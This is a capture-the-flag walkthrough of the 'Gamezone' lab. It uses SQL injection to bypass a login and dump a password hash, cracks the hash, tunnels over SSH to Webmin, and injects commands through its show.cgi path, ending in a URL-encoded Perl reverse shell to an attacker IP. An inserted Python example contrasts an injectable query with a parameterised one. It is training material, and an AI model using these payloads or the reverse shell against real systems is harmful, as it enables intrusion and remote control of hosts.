Gamezone
Difficulty: Easy→Medium
Score: 4/10
Target
- 2 flags
- system privilege
Process
Enumeration
Running Nmap
nmap -T4 -sV -A -oA Gamezone 10.10.192.4
output:
Nmap scan report for 10.10.79.249
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 28 17:59:50 2020 -- 1 IP address (1 host up) scanned in 40.81 seconds
Since we have no credentials yet to brute-force or log in to SSH, we start with the website running on port 80.
The site presents a login form. Either field can be injected to bypass it:
Username: ' or 1=1 -- -
Password: plain
Username: admin
Password: ' or 1=1 -- -
SQL injection
After that we are logged in.
We can use sqlmap or manual SQL injection; here I chose manual SQL injection.
' union select 1,2,3 -- -
This is what is returned; the 1 is not displayed, but that is fine. We can work with this.
We now want to see which databases exist in this MySQL instance.
' union select 1,2, schema_name FROM information_schema.schemata; -- -
We get 5 databases back. The bad news is that about half of them are MySQL defaults; the good news is that db is most likely the one we actually need.
We now try to get the tables that reside inside the 'db' database:
' union select 1,2, TABLE_NAME FROM information_schema.TABLES WHERE table_schema='db'; -- -
// Get table names
' union select 1,table_name, column_name FROM information_schema.columns WHERE table_name = 'users' ; -- -
// Get column names
' union select 1, username , pwd from users; -- -
Output:
agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218fxxxxxxxxxxxx
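As an added illustration (not part of the original writeup), the following Python models the kind of string-built login query that the `' or 1=1 -- -` bypass and the union-based extraction above rely on, next to the parameterised form that defeats both. The sqlite3 `users` table, the SHA-256 hashing of the password (assumed from the 64-hex-character hash) and the `login_*` functions are assumptions, not the box's actual code.

```python
import hashlib
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the site's `users` table;
    # only the column names (username, pwd) come from the writeup.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("agent47", hashlib.sha256(b"example-password").hexdigest()),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Hypothetical vulnerable login: the username is concatenated into the
    # SQL text, so a quote closes the literal and `-- -` comments out the
    # rest of the WHERE clause. Returns the matched username or None.
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = "SELECT username FROM users WHERE username = '%s' AND pwd = '%s'" % (
        username,
        pwd_hash,
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    # Parameterised query: the input is bound as data and is never parsed
    # as SQL, so neither the tautology nor a UNION can be injected.
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, pwd_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "' or 1=1 -- -", "plain"))
    print("fixed:     ", login_fixed(db, "' or 1=1 -- -", "plain"))
```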
We can crack it with john, or paste the hash into an online hash lookup and see if it is already known.
echo 'agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218fxxxxxxxxxxxx' > passwd.hash
john passwd.hash --wordlist=~/Desktop/rockyou.txt
SSH login, command and control
ssh [email protected]
After logging in, list the listening ports:
ss -tulpn
Firewall bypass
Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.
**-L** is a local tunnel (YOU <-- CLIENT). If a site is blocked, you can forward the traffic through a server you own and view it. For example, if imgur is blocked at work, you can do ssh -L 9000:imgur.com:80 [email protected]. Going to localhost:9000 on your machine will load imgur traffic via your other server.
**-R** is a remote tunnel (YOU --> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.
From our local machine, run:
ssh -L 10000:localhost:10000 [email protected]
What this does is expose the victim's port 10000 on your machine. You reach it by browsing to http://localhost:10000.
Exploit
Going to that page we see a login, and using the same credentials we already have, we can log in just fine.
Digging into this exploit, I found the official documentation for it:
http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf
The documentation shows that adding /file/show.cgi to the URL allows you to read file locations (as root) when appending a file path after 'show.cgi'.
We can use it to get a reverse shell. First, confirm command execution with a ping back to our listener:
tcpdump -i tun0 icmp
http://localhost:10000/file/show.cgi/show.cgi/bin/A|ping%20-c%203%20<your IP address>|
Perl reverse shell
http://localhost:10000/file/show.cgi/bin/4uIPiqNld|perl%20-e%20'use%20Socket;$i=%2210.4.4.98%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i))))%7Bopen(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);%7D;'|
That works as well.
Next, I know that the root flag is in the root directory, so I just went to it through the URL.